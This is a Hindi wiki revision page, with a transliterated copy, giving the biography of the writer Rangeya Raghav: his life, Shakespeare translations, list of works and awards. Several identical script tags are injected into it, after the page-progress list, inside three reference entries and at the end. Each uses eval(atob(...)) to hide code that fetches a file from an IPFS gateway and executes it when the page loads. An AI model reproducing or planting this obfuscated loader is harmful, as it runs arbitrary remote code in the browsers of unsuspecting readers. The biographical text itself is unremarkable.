Difference between revisions of "रांगेय राघव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " साफ " to " साफ़ ")
Line 42: Line 42:
 
[[भरतपुर ज़िला|भरतपुर ज़िले]] में एक तहसील है वैर। शहर के कोलाहल से दूर प्राकृतिक वातावरण, ग्रामीण सादगी और संस्कृति तथा वहाँ के वातावरण की अद्‌भुत शक्ति ने रांगेय राघव को साहित्य की साधना में इस सीमा तक प्रयुक्त किया कि वह उस छोटी सी नगरी वैर में ही बस गये। वैर भरतपुर के जाट राजाओं के एक छोटे से क़िले के कारण तो प्रसिद्ध है ही, परन्तु वहाँ [[तमिलनाडु]] के स्वामी रंगाचार्य का दक्षिण शैली का सीतारामजी का मंदिर भी बहुत प्रसिद्ध है। इस मंदिर के महंत डॉ. रांगेय राघव के बड़े भाई रहे हैं। मंदिर की शाला में बिल्कुल तपस्वी जैसा जीवन व्यतीत करने वाले तमिल भाषी व्यक्ति ने हिन्दी साहित्य की देवी की पुजारी की तरह आराधना-अर्चना की। नारियल की जटाओं के गद्दे पर लेटे-लेटे और अपने पैर के अँगूठे में छत पर टंगे पंखे की डोरी को बाँधकर हिलाते हुए वह घंटों तक साहित्य की विभिन्न विधाओं और अयामों के बारे में सोचते रहते थे। जब डॉ. रांगेय राघव सोचते तो सोचते ही रहते थे - कई दिनों तक न वह कुछ लिखते और न पढ़ते। और जब उन्हें पढ़ने की धुन सवार होती तो वह लगातार कई दिनों तक पढ़ते ही रहते। सोचने और पढ़ने के बाद जब कभी उनका मूड बनता तो वह लिखने बैठ जाते और निरन्तर लिखते ही रहते। लिखने की उनकी कला अद्‌भुत थी। एक बार तो लिखने बैठे तो वह उस रचना को समाप्त करके ही छोड़ते थे। इसी कारण जितनी कृतियाँ उन्होंने लिखीं वह सब पूरी की पूरी लिखी गईं। उनका अंतिम उपन्यास 'आखिरी आवाज़' कुछ अर्थों में इस कारण अधूरा रह गया कि वह कई महीनों तक मौत से जूझते रहे। काश ऐसा होता कि वह मौत से जूझने के बाद जीवित रहे होते तो शायद एक और उपन्यास मौत के संघर्ष के बारे में हिन्दी साहित्य को मिल गया होता।<ref name="साहित्य कुञ्ज"/>
 
[[भरतपुर ज़िला|भरतपुर ज़िले]] में एक तहसील है वैर। शहर के कोलाहल से दूर प्राकृतिक वातावरण, ग्रामीण सादगी और संस्कृति तथा वहाँ के वातावरण की अद्‌भुत शक्ति ने रांगेय राघव को साहित्य की साधना में इस सीमा तक प्रयुक्त किया कि वह उस छोटी सी नगरी वैर में ही बस गये। वैर भरतपुर के जाट राजाओं के एक छोटे से क़िले के कारण तो प्रसिद्ध है ही, परन्तु वहाँ [[तमिलनाडु]] के स्वामी रंगाचार्य का दक्षिण शैली का सीतारामजी का मंदिर भी बहुत प्रसिद्ध है। इस मंदिर के महंत डॉ. रांगेय राघव के बड़े भाई रहे हैं। मंदिर की शाला में बिल्कुल तपस्वी जैसा जीवन व्यतीत करने वाले तमिल भाषी व्यक्ति ने हिन्दी साहित्य की देवी की पुजारी की तरह आराधना-अर्चना की। नारियल की जटाओं के गद्दे पर लेटे-लेटे और अपने पैर के अँगूठे में छत पर टंगे पंखे की डोरी को बाँधकर हिलाते हुए वह घंटों तक साहित्य की विभिन्न विधाओं और अयामों के बारे में सोचते रहते थे। जब डॉ. रांगेय राघव सोचते तो सोचते ही रहते थे - कई दिनों तक न वह कुछ लिखते और न पढ़ते। और जब उन्हें पढ़ने की धुन सवार होती तो वह लगातार कई दिनों तक पढ़ते ही रहते। सोचने और पढ़ने के बाद जब कभी उनका मूड बनता तो वह लिखने बैठ जाते और निरन्तर लिखते ही रहते। लिखने की उनकी कला अद्‌भुत थी। एक बार तो लिखने बैठे तो वह उस रचना को समाप्त करके ही छोड़ते थे। इसी कारण जितनी कृतियाँ उन्होंने लिखीं वह सब पूरी की पूरी लिखी गईं। उनका अंतिम उपन्यास 'आखिरी आवाज़' कुछ अर्थों में इस कारण अधूरा रह गया कि वह कई महीनों तक मौत से जूझते रहे। काश ऐसा होता कि वह मौत से जूझने के बाद जीवित रहे होते तो शायद एक और उपन्यास मौत के संघर्ष के बारे में हिन्दी साहित्य को मिल गया होता।<ref name="साहित्य कुञ्ज"/>
 
====जानपील सिगरेट====
 
====जानपील सिगरेट====
सिगरेट पीने का उन्हें बेहद शौक था। वह सिगरेट पीते तो केवल जानपील ही, दूसरी सिगरेट को वह हाथ तक नहीं लगाते थे। एक दर्जन सिगरेट की डिब्बी उनकी लिखने की मेज पर रखी रहती थीं और ऐश-ट्रे के नाम पर रखा गया चीनी का प्याला दिन में तीन-चार बार साफ करना पड़ता। उनका कमरा था कि सिगरेट की गंध और धुएँ से भरा रहता था। किसी भी आँगन्तुक ने आकर उनके कमरे का दरवाजा खोला तो सिगरेट का एक भभका उसे लगता, परन्तु हिन्दी साहित्य के इस साधक के लिये सिगरेट पीना एक आवश्यकता बन गई थी। बिना सिगरेट पिये वह कुछ भी कर सकने में असमर्थ थे। परन्तु शायद सिगरेट पीने की यह आदत ही उनकी मृत्यु का कारण बनी, जिसने 1962 में [[हिन्दी]] के इस अनुपम योद्धा को हमसे हमेशा के लिये छीन लिया।<ref name="साहित्य कुञ्ज"/>
+
सिगरेट पीने का उन्हें बेहद शौक था। वह सिगरेट पीते तो केवल जानपील ही, दूसरी सिगरेट को वह हाथ तक नहीं लगाते थे। एक दर्जन सिगरेट की डिब्बी उनकी लिखने की मेज पर रखी रहती थीं और ऐश-ट्रे के नाम पर रखा गया चीनी का प्याला दिन में तीन-चार बार साफ़ करना पड़ता। उनका कमरा था कि सिगरेट की गंध और धुएँ से भरा रहता था। किसी भी आँगन्तुक ने आकर उनके कमरे का दरवाजा खोला तो सिगरेट का एक भभका उसे लगता, परन्तु हिन्दी साहित्य के इस साधक के लिये सिगरेट पीना एक आवश्यकता बन गई थी। बिना सिगरेट पिये वह कुछ भी कर सकने में असमर्थ थे। परन्तु शायद सिगरेट पीने की यह आदत ही उनकी मृत्यु का कारण बनी, जिसने 1962 में [[हिन्दी]] के इस अनुपम योद्धा को हमसे हमेशा के लिये छीन लिया।<ref name="साहित्य कुञ्ज"/>
 
====शेक्सपीयर के नाटकों का अनुवाद====
 
====शेक्सपीयर के नाटकों का अनुवाद====
 
विदेशी साहित्य को हिन्दी भाषा के माध्यम से हिन्दी भाषी जनता तक पहुँचाने का महान कार्य डॉ. रांगेय राघव ने किया। [[अंग्रेज़ी]] भाषा के माध्यम से कुछ फ्राँसिसी और जर्मन साहित्यकारों का अध्ययन करने के पश्चात्‌ उनके बारे में हिन्दी जगत को अवगत कराने का कार्य उन्होंने किया। विश्व प्रसिद्ध अंग्रेज़ी नाटककार शेक्सपीयर को तो उन्होंने पूरी तरह हिन्दी में उतार ही दिया। शेक्सपीयर की अनेक रचनाओं को हिन्दी में अनुवादित करके हिन्दी जगत को विश्व की महान कृतियों से धनी बनाया। शेक्सपीयर को दुखांत नाटकों में हेमलेट, ओथेलो और मैकबेथ को तो जिस खूबी से डॉ.-रांगेय राघव ने हिन्दी के पाँडाल में उतारा वह उनके जीवन की विशेष उपलब्धियों में गिनी जाती है। उनके अनुवाद की यह विशेषता थीं कि वह अनुवाद न लगकर मूल रचना ही प्रतीत होती है। शेक्सपीयर की लब्ध प्रतिष्ठित कृतियों को हिन्दी में प्रस्तुत कर उनकी भावनाओं के अनुरूप शेक्सपीयर को हिन्दी साहित्य में प्रकट करने का श्रेय डॉ. रांगेय राघव को ही जाता है और इसी कारण वह हिन्दी के शेक्सपीयर कहे जाते हैं।<ref name="साहित्य कुञ्ज"/>  
 
विदेशी साहित्य को हिन्दी भाषा के माध्यम से हिन्दी भाषी जनता तक पहुँचाने का महान कार्य डॉ. रांगेय राघव ने किया। [[अंग्रेज़ी]] भाषा के माध्यम से कुछ फ्राँसिसी और जर्मन साहित्यकारों का अध्ययन करने के पश्चात्‌ उनके बारे में हिन्दी जगत को अवगत कराने का कार्य उन्होंने किया। विश्व प्रसिद्ध अंग्रेज़ी नाटककार शेक्सपीयर को तो उन्होंने पूरी तरह हिन्दी में उतार ही दिया। शेक्सपीयर की अनेक रचनाओं को हिन्दी में अनुवादित करके हिन्दी जगत को विश्व की महान कृतियों से धनी बनाया। शेक्सपीयर को दुखांत नाटकों में हेमलेट, ओथेलो और मैकबेथ को तो जिस खूबी से डॉ.-रांगेय राघव ने हिन्दी के पाँडाल में उतारा वह उनके जीवन की विशेष उपलब्धियों में गिनी जाती है। उनके अनुवाद की यह विशेषता थीं कि वह अनुवाद न लगकर मूल रचना ही प्रतीत होती है। शेक्सपीयर की लब्ध प्रतिष्ठित कृतियों को हिन्दी में प्रस्तुत कर उनकी भावनाओं के अनुरूप शेक्सपीयर को हिन्दी साहित्य में प्रकट करने का श्रेय डॉ. रांगेय राघव को ही जाता है और इसी कारण वह हिन्दी के शेक्सपीयर कहे जाते हैं।<ref name="साहित्य कुञ्ज"/>  

Revision as of 14:13, 29 January 2013

raangey raghav
poora nam tiroomallai nanbakamh viraraghav achary (ti.en.bi.achary)
janm 17 janavari, 1923
janm bhoomi agara, uttar pradesh
mrityu 12 sitanbar, 1962
mrityu sthan muanbee, maharashtr
pati/patni sulochana
karm-kshetr upanyasakar, kahanikar, kavi, alochak, natakakar aur anuvadak
bhasha hindi, aangrezi, braj aur sanskrit
vidyalay seant j aauns k aaulej, agara vishvavidyalay
shiksha snatakottar, pi.ech.di
puraskar-upadhi hiandustani akadami puraskar, dalamiya puraskar, uttar pradesh shasan puraskar, rajasthan sahity akadami puraskar
nagarikata bharatiy
any janakari inaka mool nam ti.en.bi.achary (tiroomallai nanbakamh viraraghav achary) tha.
inhean bhi dekhean kavi soochi, sahityakar soochi

raangey raghav (aangrezi: Rangeya Raghav, janm: 17 janavari, 1923; mrityu: 12 sitanbar, 1962) asadharan pratibha ke dhani rachanakar the. hindi ke vishisht aur bahumukhi pratibhavaloan mean se ek the. inaka mool nam ti.en.bi.achary (tiroomallai nanbakamh viraraghav achary) tha. hindi sahity ka sabhanvat: aisa koee aang nahian hai, jahaan hindi sahity ke sadhak d aau. raangey raghav ne apani sadhana ka prayog n kiya ho. ye gaur varn, unnat lalat, lambi nasika aur chehare par ganbhiratamayi muskan bikhere hue hindi sahity ke anany upasak the. ve ramanujachary parampara ke tamil deshiy ayangar brahman the.

jivan parichay

raangey raghav ka janm 17 janavari, 1923 ee. mean agara mean hua tha. pita shri rangachary ke poorvaj lagabhag tin sau varsh pahale jayapur aur phir bharatapur ke bayana kasbe mean akar rahane lage the. raangey raghav ka janm hindi pradesh mean hua. unhean tamil aur kann d bhasha ka bhi jnan tha. raangey ki shiksha agara mean huee thi. seant j aauns k aaulej se 1944 mean snatakottar aur 1949 mean agara vishvavidyalay se guru gorakhanath par shodh karake unhoanne pi.ech.di. ki thi. raangey raghav ka hindi, aangrezi, braj aur sanskrit par asadharan adhikar tha.

karyakshetr

13 varsh ki ayu mean likhana shuroo kiya. 1942 mean akalagrast bangal ki yatra ke bad ek riportaj likha- toofanoan ke bich. yah riportaj hiandi mean charcha ka vishay bana. sahity ke atirikt chitrakala, sangit aur puratatv mean vishesh roochi. matr 39 varsh ki ayu mean kavita, kahani, upanyas, natak, riportaj ke atirikt alochana, sanskriti aur sabhyata par kul milakar 150 se adhik pustakean likhian. raangey raghav ke kahani-lekhan ka mukhy daur bharatiy itihas ki drishti se bahut halachal-bhara viral kalakhand hai. kam maukoan par bharatiy janata ne itane svapn aur du:svapn ek sath dekhe the. asha aur hatasha aise a dos-p dos mean kh di dekhi thi. raangey raghav ki kahaniyoan ki visheshata yah hai ki is poore samay ki shayad hi koee ghatana ho jisaki gooanjean-anugooanje unamean n suni ja sakean. sach to yah hai ki raangey raghav ne hiandi kahani ko bharatiy samaj ke un dhool-kaantoan bhare rastoan, avare-laphandaroan-parajiviyoan ki phakk d jiandagi, bharatiy gaanvoan ki kachchi aur kich d-bhari pagadandiyoan ki gasht karavaee, jinase vah bhale hi ab tak poornat: aparichit n rahi ho par is tarah hili-mili bhi nahian thi aur in 'duniyaoan' mean se jivan se labalabate aise-aise kaddavar charitr prakat kie jinhean ham vismrit nahian kar sakeange. 'gadal' bhi ek aisa hi charitr hai.[1]

hiandi ke sheksapiyar

shayad bahut kam log yah janate hoange ki hindi sahity ka yah anootha vyaktitv vastut: tamil bhashi tha, jisane hindi sahity aur bhasha ki seva karake apane alaukik pratibha se hindi ke 'sheksapiyar' ki sanjna grahan ki. raangey raghav nam ke pichhe unake vyaktitv aur sahity mean drishtigat hone vali smanvay ki bhavana parilakshit hoti hai. apane pita rangachary ke nam se unhoanne raangey svikar kiya aur apane svayan ke nam raghavachary se raghav shabd lekar apana nam raangey raghav rakh liya. unake sahity mean jaise sadagi parilakshit hoti hai vaise hi unaka jivan sidha-sadha aur sadagipoorn raha hai.[2]

sahity ki sadhana

bharatapur zile mean ek tahasil hai vair. shahar ke kolahal se door prakritik vatavaran, gramin sadagi aur sanskriti tatha vahaan ke vatavaran ki adh‌bhut shakti ne raangey raghav ko sahity ki sadhana mean is sima tak prayukt kiya ki vah us chhoti si nagari vair mean hi bas gaye. vair bharatapur ke jat rajaoan ke ek chhote se qile ke karan to prasiddh hai hi, parantu vahaan tamilanadu ke svami rangachary ka dakshin shaili ka sitaramaji ka mandir bhi bahut prasiddh hai. is mandir ke mahant d aau. raangey raghav ke b de bhaee rahe haian. mandir ki shala mean bilkul tapasvi jaisa jivan vyatit karane vale tamil bhashi vyakti ne hindi sahity ki devi ki pujari ki tarah aradhana-archana ki. nariyal ki jataoan ke gadde par lete-lete aur apane pair ke aangoothe mean chhat par tange pankhe ki dori ko baandhakar hilate hue vah ghantoan tak sahity ki vibhinn vidhaoan aur ayamoan ke bare mean sochate rahate the. jab d aau. raangey raghav sochate to sochate hi rahate the - kee dinoan tak n vah kuchh likhate aur n padhate. aur jab unhean padhane ki dhun savar hoti to vah lagatar kee dinoan tak padhate hi rahate. sochane aur padhane ke bad jab kabhi unaka mood banata to vah likhane baith jate aur nirantar likhate hi rahate. likhane ki unaki kala adh‌bhut thi. ek bar to likhane baithe to vah us rachana ko samapt karake hi chho date the. isi karan jitani kritiyaan unhoanne likhian vah sab poori ki poori likhi geean. unaka aantim upanyas 'akhiri avaz' kuchh arthoan mean is karan adhoora rah gaya ki vah kee mahinoan tak maut se joojhate rahe. kash aisa hota ki vah maut se joojhane ke bad jivit rahe hote to shayad ek aur upanyas maut ke sangharsh ke bare mean hindi sahity ko mil gaya hota.[2]

janapil sigaret

sigaret pine ka unhean behad shauk tha. vah sigaret pite to keval janapil hi, doosari sigaret ko vah hath tak nahian lagate the. ek darjan sigaret ki dibbi unaki likhane ki mej par rakhi rahati thian aur aish-tre ke nam par rakha gaya chini ka pyala din mean tin-char bar saf karana p data. unaka kamara tha ki sigaret ki gandh aur dhuean se bhara rahata tha. kisi bhi aangantuk ne akar unake kamare ka daravaja khola to sigaret ka ek bhabhaka use lagata, parantu hindi sahity ke is sadhak ke liye sigaret pina ek avashyakata ban gee thi. bina sigaret piye vah kuchh bhi kar sakane mean asamarth the. parantu shayad sigaret pine ki yah adat hi unaki mrityu ka karan bani, jisane 1962 mean hindi ke is anupam yoddha ko hamase hamesha ke liye chhin liya.[2]

sheksapiyar ke natakoan ka anuvad

videshi sahity ko hindi bhasha ke madhyam se hindi bhashi janata tak pahuanchane ka mahan kary d aau. raangey raghav ne kiya. aangrezi bhasha ke madhyam se kuchh phraansisi aur jarman sahityakaroan ka adhyayan karane ke pashchath‌ unake bare mean hindi jagat ko avagat karane ka kary unhoanne kiya. vishv prasiddh aangrezi natakakar sheksapiyar ko to unhoanne poori tarah hindi mean utar hi diya. sheksapiyar ki anek rachanaoan ko hindi mean anuvadit karake hindi jagat ko vishv ki mahan kritiyoan se dhani banaya. sheksapiyar ko dukhaant natakoan mean hemalet, othelo aur maikabeth ko to jis khoobi se d aau.-raangey raghav ne hindi ke paandal mean utara vah unake jivan ki vishesh upalabdhiyoan mean gini jati hai. unake anuvad ki yah visheshata thian ki vah anuvad n lagakar mool rachana hi pratit hoti hai. sheksapiyar ki labdh pratishthit kritiyoan ko hindi mean prastut kar unaki bhavanaoan ke anuroop sheksapiyar ko hindi sahity mean prakat karane ka shrey d aau. raangey raghav ko hi jata hai aur isi karan vah hindi ke sheksapiyar kahe jate haian.[2]

rachanaean

raangey raghav hindi ke pragatishil vicharoan ke lekhak the, kintu marks ke darshan ko unhoanne sanshodhit roop mean hi svikar kiya. unhoanne alp samay mean hi kitane sahity ka srijan kiya, isaka anuman is vivaran se lagaya ja sakata hai. unake prakashit granthoan mean 42 upanyas, 11 kahani, 12 alochanatmak granth, 8 kavy, 4 itihas, 6 samajashastr vishayak, 5 natak aur lagabhag 50 anoodit pustakean haian. ye sab rachanaean unake jivan kal mean prakashit ho chuki thian. 39 varsh ki kachchi umr mean inaka dehant hua, lagabhag 20 pustakean prakashan ki pratiksha mean thian. yadyapi unhoanne kuchh aangrezi granthoan ke bhi anuvad kie, kintu unake adhikaansh sahity ka parivesh bharatiy sanskriti aur aitihasik jivan hi raha hai.

raangey raghav ki kritiyaan[2]
upanyas
  • gharauanda
  • vishad math
  • muradoan ka tila
  • sidha sadha rasta
  • hujoor
  • chivar
  • pratidan
  • aandhere ke juganoo
  • kaka
  • ubal
  • paraya
  • devaki ka beta
  • yashodhara jit gee
upanyas
  • loee ka tana
  • ratna ki bat
  • bharati ka sapoot
  • aandhi ki navean
  • aandhere ki bhookh
  • bolate khandahar
  • kab tak pukarooan
  • pakshi aur akash
  • baune aur ghayal phool
  • lakhima ki aankhean
  • raee aur parvat
  • bandook aur bin
  • rah n ruki
upanyas
  • jab avegi kali ghata
  • dhooni ka dhuaan
  • chhoti si bat
  • path ka pap
  • meri bhav badha haro
  • dharati mera ghar
  • ag ki pyas
  • kalpana
  • prophesar
  • dayare
  • patajhar
  • akhiri avaz
kahani sangrah
  • samrajy ka vaibhav
  • devadasi
  • samudr ke phen
  • adhoori moorat
  • jivan ke dane
  • aangare n bujhe
  • aiyash murade
  • insan paida hua
  • paanch gadhe
  • ek chho d ek
kavy
  • ajey
  • khandahar
  • pighalate patthar
  • medhavi
  • rah ke dipak
  • paanchali
  • roopachhaya
natak
  • svarnabhoomi ki yatra
  • ramanuj
  • viroodhak
riportaj
  • toofanoan ke bich
alochana
  • bharatiy punarjagaran ki bhoomika
  • bharatiy sant paranpara aur samaj
  • sangam aur sangharsh
  • prachin bharatiy paranpara aur itihas
  • pragatishil sahity ke manadand
  • samiksha aur adarsh
  • kavy yatharth aur pragati
  • kavy kala aur shastr
  • mahakavy vivechan
  • tulasi ka kala shilp
  • adhunik hiandi kavita mean prem aur shrriangar
  • adhunik hiandi kavita mean vishay aur shaili
  • gorakhanath aur unaka yug

puraskar

  • hiandustani akadami puraskar (1947)
  • dalamiya puraskar (1954)
  • uttar pradesh shasan puraskar (1957 tatha 1959)
  • rajasthan sahity akadami puraskar (1961)
  • mahatma gaandhi puraskar[3] (1966)

nidhan

raangey raghav ka nidhan matr 39 varsh ki umr mean muanbee mean sanh 1962 mean ho gaya tha. is adbhut rachanakar ko mrityu ne itani jaldi n utha liya hota to ve aur bhi naye mapadand sthapit karate. virale hi aise sapoot hue haian jinhoanne vidhata ki or se kam umr milane ke bavajood is vishv ko itana kuchh avadan de diya ki aj bhi achchhe-achchhe lekhak daantoan tale aanguliyaan dabane ko vivash ho jate haian. upanyas, kahani, kavita, alochana, natak, riportaj, itihas-sanskriti tatha samajashastr, manavashastr aur anuvad, chitrakari... ya yooan kahean ki sabhi vidhaoan par unaki lekhani bebak chalati rahi aur usase jo niahsrit hua, usase sahityapremi aj bhi anandit hote haian, prerana lete haian. 12 sitambar 1962 ko unaka sharir pantatatv mean vilin ho gaya, lekin unaka yash aj bhi vidyaman hai. 39 varsh ki alpayu mean dedh sau se adhik kritiyaan bheant kar nissandeh unhoanne srijan jagat ko ashcharyachakit kar diya. bangal ke akal ki vibhishika par riportaj 'toophanoan ke bich' mean unhoanne jo kirtiman sthapit kiya, vah aj bhi avismaraniy hai.[4]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. raangey raghav / parichay (hiandi) kavitakosh. abhigaman tithi: 22 janavari, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. 2.0 2.1 2.2 2.3 2.4 katarapanch, em.si.. hindi ke sheksapiyar: tamil bhashi hindi sadhak - raangey raghav (hiandi) (ech.ti.em.el) sahity kunj. abhigaman tithi: 22 janavari, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> Cite error: Invalid <ref> tag; name "sahity kunj" defined multiple times with different content
  3. yah puraskar inhean maranoparaant diya gaya tha.
  4. raangey raghav ko sadar shraddhaanjali (hiandi) (ech.ti.em.el) sahith‍y - sansh‍kriti eetisi. abhigaman tithi: 22 janavari, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>